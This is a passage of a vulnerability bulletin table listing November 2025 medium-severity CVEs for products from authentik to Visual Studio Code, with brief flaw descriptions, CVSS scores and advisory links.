| goauthentik--authentik | authentik is an open-source Identity Provider. Prior to versions 2025.8.5 and 2025.10.2, in previous authentik versions, invitations were considered valid regardless if they are expired or not, thus relying on background tasks to clean up expired ones. In a normal scenario this can take up to 5 minutes because the cleanup of expired objects is scheduled to run every 5 minutes. However, with a large amount of tasks in the backlog, this might take longer. authentik versions 2025.8.5 and 2025.10.2 fix this issue. A workaround involves creating a policy that explicitly checks whether the invitation is still valid, and then bind it to the invitation stage on the invitation flow, and denying access if the invitation is not valid. | 2025-11-19 | 5.8 | CVE-2025-64708 | https://github.com/goauthentik/authentik/security/advisories/GHSA-ch7q-53v8-73pc https://github.com/goauthentik/authentik/commit/6672e6aaa41e0f2c9bfb1e4d8b51cf114969e830   |
| goauthentik--authentik | authentik is an open-source Identity Provider. Prior to versions 2025.8.5 and 2025.10.2, when authenticating with client_id and client_secret to an OAuth provider, authentik creates a service account for the provider. In previous authentik versions, authentication for this account was possible even when the account was deactivated. Other permissions are correctly applied and federation with other providers still take assigned policies correctly into account. authentik versions 2025.8.5 and 2025.10.2 fix this issue. A workaround involves adding a policy to the application that explicitly checks if the service account is still valid, and deny access if not. | 2025-11-19 | 4.8 | CVE-2025-64521 | https://github.com/goauthentik/authentik/security/advisories/GHSA-xr73-jq5p-ch8r https://github.com/goauthentik/authentik/commit/9dbdfc3f1be0f1be36f8efce2442897b2a54a71c   |
| HashiCorp--Terraform Enterprise | Terraform state versions can be created by a user with specific but insufficient permissions in a Terraform Enterprise workspace. This may allow for the alteration of infrastructure if a subsequent plan operation is approved by a user with approval permission or auto-applied. This vulnerability, CVE-2025-13432, is fixed in Terraform Enterprise version 1.1.1 and 1.0.3. | 2025-11-21 | 4.3 | CVE-2025-13432 | https://discuss.hashicorp.com/t/hcsec-2025-34-terraform-enterprise-state-versions-can-be-created-by-users-without-sufficient-write-access/76821   |
| HCL Software--Glovius Cloud | A Cross-Site Request Forgery (CSRF) vulnerability was identified in HCL Glovius Cloud. An attacker can force a user's web browser to execute an unwanted, malicious action on a trusted site where the user is authenticated, specifically on one endpoint. | 2025-11-20 | 6.8 | CVE-2025-62346 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0126459   |
| Hewlett Packard Enterprise (HPE)--HPE Aruba Networkign AOS-CX | A command injection vulnerability exists in the AOS-CX Operating System. Successful exploitation could allow an authenticated remote attacker to conduct a Remote Code Execution (RCE) on the affected system. | 2025-11-18 | 6.7 | CVE-2025-37157 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04888en_us&docLocale=en_US   |
| Hewlett Packard Enterprise (HPE)--HPE Aruba Networking 100 Series Cellular Bridge | A vulnerability in the command line interface of affected devices could allow an authenticated remote attacker to conduct a command injection attack. Successful exploitation could allow an attacker to execute arbitrary commands on the underlying operating system. | 2025-11-18 | 6.5 | CVE-2025-37162 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04970en_us&docLocale=en_US   |
| Hewlett Packard Enterprise (HPE)--HPE Aruba Networking AOS-CX | A platform-level denial-of-service (DoS) vulnerability exists in ArubaOS-CX software. Successful exploitation of this vulnerability could allow an attacker with administrative access to execute specific code that renders the switch non-bootable and effectively non-functional. | 2025-11-18 | 6.8 | CVE-2025-37156 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04888en_us&docLocale=en_US   |
| Hewlett Packard Enterprise (HPE)--HPE Aruba Networking AOS-CX | A command injection vulnerability exists in the AOS-CX Operating System. Successful exploitation could allow an authenticated remote attacker to conduct a Remote Code Execution (RCE) on the affected system. | 2025-11-18 | 6.7 | CVE-2025-37158 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04888en_us&docLocale=en_US   |
| Hewlett Packard Enterprise (HPE)--HPE Aruba Networking AOS-CX | A vulnerability in the web management interface of the AOS-CX OS user authentication service could allow an authenticated remote attacker to hijack an active user session. Successful exploitation may enable the attacker to maintain unauthorized access to the session, potentially leading to the view or modification of sensitive configuration data. | 2025-11-18 | 5.8 | CVE-2025-37159 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04888en_us&docLocale=en_US   |
| Hewlett Packard Enterprise (HPE)--HPE Aruba Networking AOS-CX | A broken access control (BAC) vulnerability in the web-based management interface could allow an authenticated remote attacker with low privileges to view sensitive information. Successful exploitation of this vulnerability could enable the attacker to disclose sensitive data. | 2025-11-18 | 5.3 | CVE-2025-37160 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04888en_us&docLocale=en_US   |
| humanityco--Cookie Notice & Compliance for GDPR / CCPA | The Cookie Notice & Compliance for GDPR / CCPA plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's cookies_accepted shortcode in all versions up to, and including, 2.5.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-22 | 6.4 | CVE-2025-11186 | https://www.wordfence.com/threat-intel/vulnerabilities/id/19700658-1bef-4e85-a995-d86fff508cdf?source=cve https://plugins.trac.wordpress.org/browser/cookie-notice/tags/2.5.7/cookie-notice.php#L1060 https://plugins.trac.wordpress.org/browser/cookie-notice/tags/2.5.7/cookie-notice.php#L1181   |
| IBM--Concert | IBM Concert 1.0.0 through 2.0.0 is vulnerable to cross-site scripting. This vulnerability allows an unauthenticated attacker to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. | 2025-11-20 | 6.1 | CVE-2025-36153 | https://www.ibm.com/support/pages/node/7252019   |
| IBM--Concert | IBM Concert 1.0.0 through 2.0.0 could allow a local user to forge log files to impersonate other users or hide their identity due to improper neutralization of output. | 2025-11-20 | 6.2 | CVE-2025-36159 | https://www.ibm.com/support/pages/node/7252019   |
| IBM--Concert | IBM Concert 1.0.0 through 2.0.0 could allow a local user with specific permission to obtain sensitive information from files due to uncontrolled recursive directory copying. | 2025-11-20 | 5.1 | CVE-2025-36158 | https://www.ibm.com/support/pages/node/7252019   |
| IBM--Concert | IBM Concert 1.0.0 through 2.0.0 could disclose sensitive server information from HTTP response headers that could aid in further attacks against the system. | 2025-11-20 | 5.3 | CVE-2025-36160 | https://www.ibm.com/support/pages/node/7252019   |
| IBM--Concert | IBM Concert 1.0.0 through 2.0.0 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict-Transport-Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. | 2025-11-20 | 5.9 | CVE-2025-36161 | https://www.ibm.com/support/pages/node/7252019   |
| IBM--i | IBM i 7.2, 7.3, 7.4, 7.5, and 7.6 are impacted by obtaining an information vulnerability in the database plan cache implementation.  A user with access to the database plan cache could see information they do not have authority to view. | 2025-11-19 | 6.5 | CVE-2025-36371 | https://www.ibm.com/support/pages/node/7251699   |
| IBM--IBM Concert Software | IBM Concert Software 1.0.0 through 2.0.0 could allow a remote attacker to hijack the clicking action of the victim. | 2025-11-21 | 6.3 | CVE-2025-36149 | https://www.ibm.com/support/pages/node/7252019   |
| IBM--IBM Planning Analytics Local | IBM Planning Analytics Local 2.1.0 through 2.1.14 stores sensitive information in source code could be used in further attacks against the system. | 2025-11-17 | 4.3 | CVE-2025-36299 | https://www.ibm.com/support/pages/node/7251265   |
| iCam365--P201 | The affected product allows unauthenticated access to Real Time Streaming Protocol (RTSP) services, which may allow an attacker unauthorized access to camera configuration information. | 2025-11-20 | 6.8 | CVE-2025-62674 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-324-02 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-324-02.json https://icam365.net/en/aboutUs/   |
| iCam365--P201 | The affected products allow unauthenticated access to Open Network Video Interface Forum (ONVIF) services, which may allow an attacker unauthorized access to camera configuration information. | 2025-11-20 | 6.8 | CVE-2025-64770 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-324-02 https://icam365.net/en/aboutUs/ https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-324-02.json   |
| icegram--Email Subscribers & Newsletters Powerful Email Marketing, Post Notification & Newsletter Plugin for WordPress & WooCommerce | The Icegram Express - Email Subscribers, Newsletters and Marketing Automation Plugin for WordPress is vulnerable to Authorization in versions up to, and including, 5.9.10. This is due to the plugin not properly verifying that a user is authorized to perform an action in the `trigger_mailing_queue_sending` function. This makes it possible for unauthenticated attackers to force immediate email sending, bypass the schedule, increase server load, and change plugin state (e.g., last-cron-hit), enabling abuse or DoS-like effects. | 2025-11-19 | 5.3 | CVE-2025-12349 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0b4cbe21-9f1b-425b-8141-ae075baaf717?source=cve https://plugins.trac.wordpress.org/browser/email-subscribers/tags/5.9.4/lite/includes/classes/class-es-queue.php#L54 https://plugins.trac.wordpress.org/browser/email-subscribers/tags/5.9.4/lite/includes/classes/class-es-queue.php#L1132 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3394838%40email-subscribers%2Ftrunk&old=3393565%40email-subscribers%2Ftrunk&sfp_email=&sfph_mail=   |
| ideastocode--Enable SVG, WebP, and ICO Upload | The Enable SVG, WebP, and ICO Upload plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. | 2025-11-18 | 6.4 | CVE-2025-12457 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d5f267a5-012d-4b9a-a59d-9eccb04c557a?source=cve https://plugins.trac.wordpress.org/browser/enable-svg-webp-ico-upload/tags/1.1.2/includes/class-svg.php#L21   |
| integrationshotelrunner--HotelRunner Booking Widget | The HotelRunner Booking Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'hotelrunner' shortcode in all versions up to, and including, 5.2.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-13135 | https://www.wordfence.com/threat-intel/vulnerabilities/id/df2854c4-5d57-4c39-a28f-41dab36a086e?source=cve https://wordpress.org/plugins/hotelrunner/#developers   |
| interledger--Coil Web Monetization | The Coil Web Monetization plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.2. This is due to missing or incorrect nonce validation on the coil-get-css-selector parameter handling in the maybe_restrict_content function. This makes it possible for unauthenticated attackers to trigger CSS selector detection functionality via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-11-18 | 4.3 | CVE-2025-9625 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4aa4cb93-7af3-4427-a17f-160b27fcebb8?source=cve https://plugins.trac.wordpress.org/browser/coil-web-monetization/tags/2.0.2/includes/functions.php#L48 https://plugins.trac.wordpress.org/browser/coil-web-monetization/tags/2.0.2/includes/gating/functions.php#L202 https://plugins.trac.wordpress.org/browser/coil-web-monetization/tags/2.0.2/includes/gating/functions.php#L195   |
| Iqbolshoh--php-business-website | A security vulnerability has been detected in Iqbolshoh php-business-website up to 10677743a8dfc281f85291a27cf63a0bce043c24. This affects an unknown part of the file /admin/about.php. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. | 2025-11-17 | 4.7 | CVE-2025-13275 | VDB-332610 | Iqbolshoh php-business-website about.php unrestricted upload VDB-332610 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #690049 | php-business-website web 1 Unrestricted Upload https://github.com/mhszed/Report/blob/main/php-business-website%20upload.docx   |
| itsourcecode--COVID Tracking System | A vulnerability was detected in itsourcecode COVID Tracking System 1.0. This affects an unknown function of the file /admin/?page=establishment. The manipulation of the argument ID results in sql injection. It is possible to launch the attack remotely. The exploit is now public and may be used. | 2025-11-23 | 6.3 | CVE-2025-13567 | VDB-333331 | itsourcecode COVID Tracking System page sql injection VDB-333331 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #698116 | itsourcecode COVID Tracking System V1.0 SQL Injection https://github.com/Abxery/cveee/issues/9 https://itsourcecode.com/   |
| itsourcecode--COVID Tracking System | A flaw has been found in itsourcecode COVID Tracking System 1.0. This impacts an unknown function of the file /admin/?page=people. This manipulation of the argument ID causes sql injection. The attack can be initiated remotely. The exploit has been published and may be used. | 2025-11-23 | 6.3 | CVE-2025-13568 | VDB-333332 | itsourcecode COVID Tracking System page sql injection VDB-333332 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #698117 | itsourcecode COVID Tracking System V1.0 SQL Injection https://github.com/Abxery/cveee/issues/10 https://itsourcecode.com/   |
| itsourcecode--COVID Tracking System | A vulnerability has been found in itsourcecode COVID Tracking System 1.0. Affected is an unknown function of the file /admin/?page=city. Such manipulation of the argument ID leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-11-23 | 6.3 | CVE-2025-13569 | VDB-333333 | itsourcecode COVID Tracking System page sql injection VDB-333333 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #698655 | itsourcecode COVID Tracking System V1.0 SQL Injection https://github.com/yihaofuweng/cve/issues/58 https://itsourcecode.com/   |
| itsourcecode--COVID Tracking System | A vulnerability was found in itsourcecode COVID Tracking System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/?page=state. Performing manipulation of the argument ID results in sql injection. The attack may be initiated remotely. The exploit has been made public and could be used. | 2025-11-23 | 6.3 | CVE-2025-13570 | VDB-333334 | itsourcecode COVID Tracking System page sql injection VDB-333334 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #698656 | itsourcecode COVID Tracking System V1.0 SQL Injection https://github.com/yihaofuweng/cve/issues/59 https://itsourcecode.com/   |
| itsourcecode--Online Voting System | A security flaw has been discovered in itsourcecode Online Voting System 1.0. The impacted element is an unknown function of the file /ajax.php?action=save_user. Performing manipulation of the argument ID results in sql injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited. | 2025-11-17 | 6.3 | CVE-2025-13286 | VDB-332626 | itsourcecode Online Voting System ajax.php sql injection VDB-332626 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #690888 | itsourcecode Online Voting System V1.0 SQL Injection https://github.com/WANGshuyan2025/cve/issues/8 https://itsourcecode.com/   |
| itsourcecode--Online Voting System | A weakness has been identified in itsourcecode Online Voting System 1.0. This affects an unknown function of the file /index.php?page=categories. Executing manipulation of the argument id/category can lead to sql injection. The attack can be executed remotely. The exploit has been made available to the public and could be exploited. | 2025-11-17 | 6.3 | CVE-2025-13287 | VDB-332627 | itsourcecode Online Voting System index.php sql injection VDB-332627 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #690889 | itsourcecode Online Voting System V1.0 SQL Injection Submit #690891 | itsourcecode Online Voting System V1.0 SQL Injection (Duplicate) https://github.com/WANGshuyan2025/cve/issues/9 https://itsourcecode.com/   |
| itsourcecode--Student Information System | A vulnerability was determined in itsourcecode Student Information System 1.0. The affected element is an unknown function of the file /enrollment_edit1.php. Executing manipulation of the argument en_id can lead to sql injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. | 2025-11-18 | 6.3 | CVE-2025-13325 | VDB-332669 | itsourcecode Student Information System enrollment_edit1.php sql injection VDB-332669 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691929 | itsourcecode Student Information System V1.0 SQL Injection https://github.com/chenxiyue-2006/CVE/issues/1 https://itsourcecode.com/   |
| itvn9online--EchBay Admin Security | The EchBay Admin Security plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the '_ebnonce' parameter in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-11-21 | 6.1 | CVE-2025-11885 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6e7bd966-9a98-4192-83d9-e1682ec00a02?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3398386%40echbay-admin-security&new=3398386%40echbay-admin-security&sfp_email=&sfph_mail=   |
| jameschz--Hush Framework | A weakness has been identified in jameschz Hush Framework 2.0. The impacted element is an unknown function of the file Hush\hush-lib\hush\Util.php of the component HTTP Host Header Handler. This manipulation of the argument $_SERVER['HOST'] causes improper neutralization of http headers for scripting syntax. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-20 | 5.3 | CVE-2025-13434 | VDB-332978 | jameschz Hush Framework HTTP Host Header Util.php http headers for scripting syntax VDB-332978 | CTI Indicators (IOB, IOC, IOA) Submit #687568 | jameschz Hush 2.0 Improper Neutralization of HTTP Headers for Scripting Syntax https://github.com/lakshayyverma/CVE-Discovery/blob/main/hush.md   |
| jcollings--Import WP Export and Import CSV and XML files to WordPress | The Import WP - Export and Import CSV and XML files to WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.14.17 via the import/export functionality and a lack of .htaccess protection. This makes it possible for unauthenticated attackers to extract sensitive data from exports stored in /exportwp and import data stored in /importwp. | 2025-11-21 | 5.3 | CVE-2025-12894 | https://www.wordfence.com/threat-intel/vulnerabilities/id/28ca9590-dc0b-40c9-9de6-1480094ea8be?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3394624%40jc-importer&new=3394624%40jc-importer&sfp_email=&sfph_mail=   |
| johnjamesjacoby--Post Type Switcher | The Post Type Switcher plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 4.0.0 due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Author-level access and above, to modify the post type of arbitrary posts and pages they do not own, including those created by administrators, which can lead to site disruption, broken navigation, and SEO impact. | 2025-11-18 | 5.4 | CVE-2025-12524 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d875514c-c7d3-4236-842b-6e772048448d?source=cve https://plugins.trac.wordpress.org/browser/post-type-switcher/tags/4.0.0/post-type-switcher.php#L469 https://plugins.trac.wordpress.org/browser/post-type-switcher/tags/4.0.0/post-type-switcher.php#L486 https://cwe.mitre.org/data/definitions/639.html https://owasp.org/API-Security/editions/2023/en/0xa1-broken-object-level-authorization/ https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3391983%40post-type-switcher%2Ftrunk&old=3331072%40post-type-switcher%2Ftrunk&sfp_email=&sfph_mail=   |
| Kaspersky--Kaspersky Endpoint Security | Kaspersky has fixed a security issue in Kaspersky Endpoint Security for Linux (any version with anti-virus databases prior to 18.11.2025), Kaspersky Industrial CyberSecurity for Linux Nodes (any version with anti-virus databases prior to 18.11.2025), and Kaspersky Endpoint Security for Mac (12.0.0.325, 12.1.0.553, and 12.2.0.694 with anti-virus databases prior to 18.11.2025) that could have allowed a reflected XSS attack to be carried out by an attacker using phishing techniques. | 2025-11-20 | 6.1 | CVE-2025-64984 | Advisory issued on November 18, 2025   |
| kurudrive--VK All in One Expansion Unit | The VK All in One Expansion Unit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'vkExUnit_cta_url' and 'vkExUnit_cta_button_text' parameters in all versions up to, and including, 9.112.1. This is due to a logic error in the CTA save function that reads sanitization callbacks from the wrong variable ($custom_field_name instead of $custom_field_options), causing the sanitization to never be applied. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that execute when a user accesses an injected page.", | 2025-11-18 | 6.4 | CVE-2025-11265 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9e5a6158-03d4-4ac7-8a4b-666cedabb433?source=cve https://plugins.trac.wordpress.org/browser/vk-all-in-one-expansion-unit/tags/9.112.0.1/inc/call-to-action/package/class-vk-call-to-action.php#L198 https://plugins.trac.wordpress.org/browser/vk-all-in-one-expansion-unit/tags/9.112.0.1/inc/call-to-action/package/block/index.php#L259 https://plugins.trac.wordpress.org/browser/vk-all-in-one-expansion-unit/tags/9.112.0.1/inc/call-to-action/package/block/index.php#L271 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3394731%40vk-all-in-one-expansion-unit%2Ftrunk&old=3385606%40vk-all-in-one-expansion-unit%2Ftrunk&sfp_email=&sfph_mail=#file2   |
| kurudrive--VK All in One Expansion Unit | The VK All in One Expansion Unit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the '_veu_custom_css' parameter in all versions up to, and including, 9.112.1. This is due to insufficient input sanitization and output escaping on the user-supplied Custom CSS value. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that execute whenever a user accesses an injected page. | 2025-11-18 | 6.4 | CVE-2025-11267 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8996a0f0-8a49-4310-917b-62172c12afdb?source=cve https://plugins.trac.wordpress.org/browser/vk-all-in-one-expansion-unit/tags/9.112.0.1/admin/class-veu-metabox.php#L178 https://plugins.trac.wordpress.org/browser/vk-all-in-one-expansion-unit/tags/9.112.0.1/inc/css-customize/css-customize-single.php#L32 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3393317%40vk-all-in-one-expansion-unit%2Ftrunk&old=3385606%40vk-all-in-one-expansion-unit%2Ftrunk&sfp_email=&sfph_mail=   |
| kwmanagement--Pet-Manager Petfinder | The Pet-Manager - Petfinder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the kwm-petfinder shortcode in all versions up to, and including, 3.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-19 | 6.4 | CVE-2025-12710 | https://www.wordfence.com/threat-intel/vulnerabilities/id/35b0d959-2adb-4de4-b51b-1bfead49bc7d?source=cve https://plugins.trac.wordpress.org/browser/tier-management-petfinder/tags/3.6.1/kwm-petfinder.php#L133 https://plugins.trac.wordpress.org/browser/tier-management-petfinder/tags/3.6.1/kwm-petfinder.php#L163 https://plugins.trac.wordpress.org/browser/tier-management-petfinder/tags/3.6.1/kwm-petfinder.php#L164 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3396792%40tier-management-petfinder&new=3396792%40tier-management-petfinder&sfp_email=&sfph_mail=   |
| langfuse--langfuse | Langfuse is an open source large language model engineering platform. In versions from 2.95.0 to before 2.95.12 and from 3.17.0 to before 3.131.0, in SSO provider configurations without an explicit AUTH_<PROVIDER>_CHECK setting, a potential account takeover may happen if an authenticated user is made to call a specifically crafted URL via a CSRF or phishing attack. This issue has been patched in versions 2.95.12 and 3.131.0. A workaround for this issue involves setting AUTH_<PROVIDER>_CHECK. | 2025-11-21 | 6.5 | CVE-2025-65107 | https://github.com/langfuse/langfuse/security/advisories/GHSA-w9pw-c549-5m6w   |
| librenms--librenms | LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Prior to version 25.11.0, a reflected cross-site scripting (XSS) vulnerability was identified in the LibreNMS application at the /maps/nodeimage endpoint. The Image Name parameter is reflected in the HTTP response without proper output encoding or sanitization, allowing an attacker to craft a URL that, when visited by a victim, causes arbitrary JavaScript execution in the victim's browser. This issue has been patched in version 25.11.0. | 2025-11-18 | 6.2 | CVE-2025-65013 | https://github.com/librenms/librenms/security/advisories/GHSA-j8cq-7f6p-256x   |
| librenms--librenms | LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Prior to version 25.11.0, a boolean-based blind SQL injection vulnerability was identified in the LibreNMS application at the /ajax_output.php endpoint. The hostname parameter is interpolated directly into an SQL query without proper sanitization or parameter binding, allowing an attacker to manipulate the query logic and infer data from the database through conditional responses. This issue has been patched in version 25.11.0. | 2025-11-18 | 5.5 | CVE-2025-65093 | https://github.com/librenms/librenms/security/advisories/GHSA-6pmj-xjxp-p8g9   |
| lightgalleryteam--LightGallery WP | Multiple plugins and/or themes for WordPress are vulnerable to Stored Cross-Site Scripting via the plugin's bundled lightGallery library (<= 2.8.3) in various versions due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-20 | 6.4 | CVE-2025-5092 | https://www.wordfence.com/threat-intel/vulnerabilities/id/acaa3142-2bbc-43d3-8ecc-05e8edb931ec?source=cve https://github.com/sachinchoolur/lightGallery https://plugins.trac.wordpress.org/changeset/3311382/ https://plugins.trac.wordpress.org/changeset/3356089/ https://plugins.trac.wordpress.org/changeset/3372141/ https://plugins.trac.wordpress.org/changeset/3343557/   |
| lsfusion--platform | A weakness has been identified in lsfusion platform up to 6.1. This vulnerability affects the function unpackFile of the file server/src/main/java/lsfusion/server/physics/dev/integration/external/to/file/ZipUtils.java. This manipulation causes path traversal. It is possible to initiate the attack remotely. | 2025-11-17 | 6.3 | CVE-2025-13265 | VDB-332600 | lsfusion platform ZipUtils.java unpackFile path traversal VDB-332600 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #689427 | lsFusion 6.1 Arbitrary File Overwrite and Deletion https://github.com/lsfusion/platform/issues/1545   |
| lsfusion--platform | A vulnerability was found in lsfusion platform up to 6.1. Affected is the function DownloadFileRequestHandler of the file web-client/src/main/java/lsfusion/http/controller/file/DownloadFileRequestHandler.java. Performing manipulation of the argument Version results in path traversal. Remote exploitation of the attack is possible. The exploit has been made public and could be used. | 2025-11-17 | 5.3 | CVE-2025-13261 | VDB-332596 | lsfusion platform DownloadFileRequestHandler.java DownloadFileRequestHandler path traversal VDB-332596 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #689412 | lsFusion 6.1 Unauthorized Arbitrary File Read https://github.com/lsfusion/platform/issues/1543 https://github.com/lsfusion/platform/issues/1543#issue-3576922131   |
| lukevella--rallly | Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an Insecure Direct Object Reference (IDOR) vulnerability in the poll duplication endpoint (/api/trpc/polls.duplicate) allows any authenticated user to duplicate polls they do not own by modifying the pollId parameter. This effectively bypasses access control and lets unauthorized users clone private or administrative polls. This issue has been patched in version 4.5.4. | 2025-11-19 | 6.5 | CVE-2025-65020 | https://github.com/lukevella/rallly/security/advisories/GHSA-44w7-pf32-gv5m https://github.com/lukevella/rallly/releases/tag/v4.5.4   |
| lukevella--rallly | Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an insecure direct object reference (IDOR) vulnerability allows any authenticated user to modify other participants' votes in polls without authorization. The backend relies solely on the participantId parameter to identify which votes to update, without verifying ownership or poll permissions. This allows an attacker to alter poll results in their favor, directly compromising data integrity. This issue has been patched in version 4.5.4. | 2025-11-19 | 6.5 | CVE-2025-65028 | https://github.com/lukevella/rallly/security/advisories/GHSA-pchc-v5hg-f5gp https://github.com/lukevella/rallly/releases/tag/v4.5.4   |
| lukevella--rallly | Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an improper authorization flaw in the comment creation endpoint allows authenticated users to impersonate any other user by altering the authorName field in the API request. This enables attackers to post comments under arbitrary usernames, including privileged ones such as administrators, potentially misleading other users and enabling phishing or social engineering attacks. This issue has been patched in version 4.5.4. | 2025-11-19 | 6.5 | CVE-2025-65031 | https://github.com/lukevella/rallly/security/advisories/GHSA-hhfc-6gq7-rrpm https://github.com/lukevella/rallly/releases/tag/v4.5.4   |
| lukevella--rallly | Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an Insecure Direct Object Reference (IDOR) vulnerability allows any authenticated user to change the display names of other participants in polls without being an admin or the poll owner. By manipulating the participantId parameter in a rename request, an attacker can modify another user's name, violating data integrity and potentially causing confusion or impersonation attacks. This issue has been patched in version 4.5.4. | 2025-11-19 | 6.5 | CVE-2025-65032 | https://github.com/lukevella/rallly/security/advisories/GHSA-q9m7-chfx-43xw https://github.com/lukevella/rallly/releases/tag/v4.5.4   |
| macrozheng--mall | A vulnerability was detected in macrozheng mall up to 1.0.3. Affected by this issue is the function delete of the file /member/readHistory/delete. Performing manipulation of the argument ids results in improper access controls. Remote exploitation of the attack is possible. The exploit is now public and may be used. | 2025-11-20 | 5.4 | CVE-2025-13443 | VDB-333016 | macrozheng mall delete access control VDB-333016 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #690892 | mall <=1.0.3 Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/15   |
| MacWarrior--clipbucket-v5 | ClipBucket v5 is an open source video sharing platform. In ClipBucket version 5.5.2, a change to network.class.php causes the application to dynamically build the server URL from the incoming HTTP Host header when the configuration base_url is not set. Because Host is a client-controlled header, an attacker can supply an arbitrary Host value. This allows an attacker to cause password-reset links (sent by forget.php) to be generated with the attacker's domain. If a victim follows that link and enters their activation code on the attacker-controlled domain, the attacker can capture the code and use it to reset the victim's password and take over the account. This issue has been patched in version 5.5.2#162. | 2025-11-20 | 6.8 | CVE-2025-62709 | https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-xhhf-mpqr-2cq5 https://github.com/MacWarrior/clipbucket-v5/commit/1a93532e665217b5d329808ca78e37e59e9f8a9d   |
| Microsoft--Visual Studio Code | Improper access control in GitHub Copilot and Visual Studio Code allows an authorized attacker to bypass a security feature over a network. | 2025-11-20 | 5.7 | CVE-2025-64660 | GitHub Copilot and Visual Studio Code Security Feature Bypass Vulnerability   |
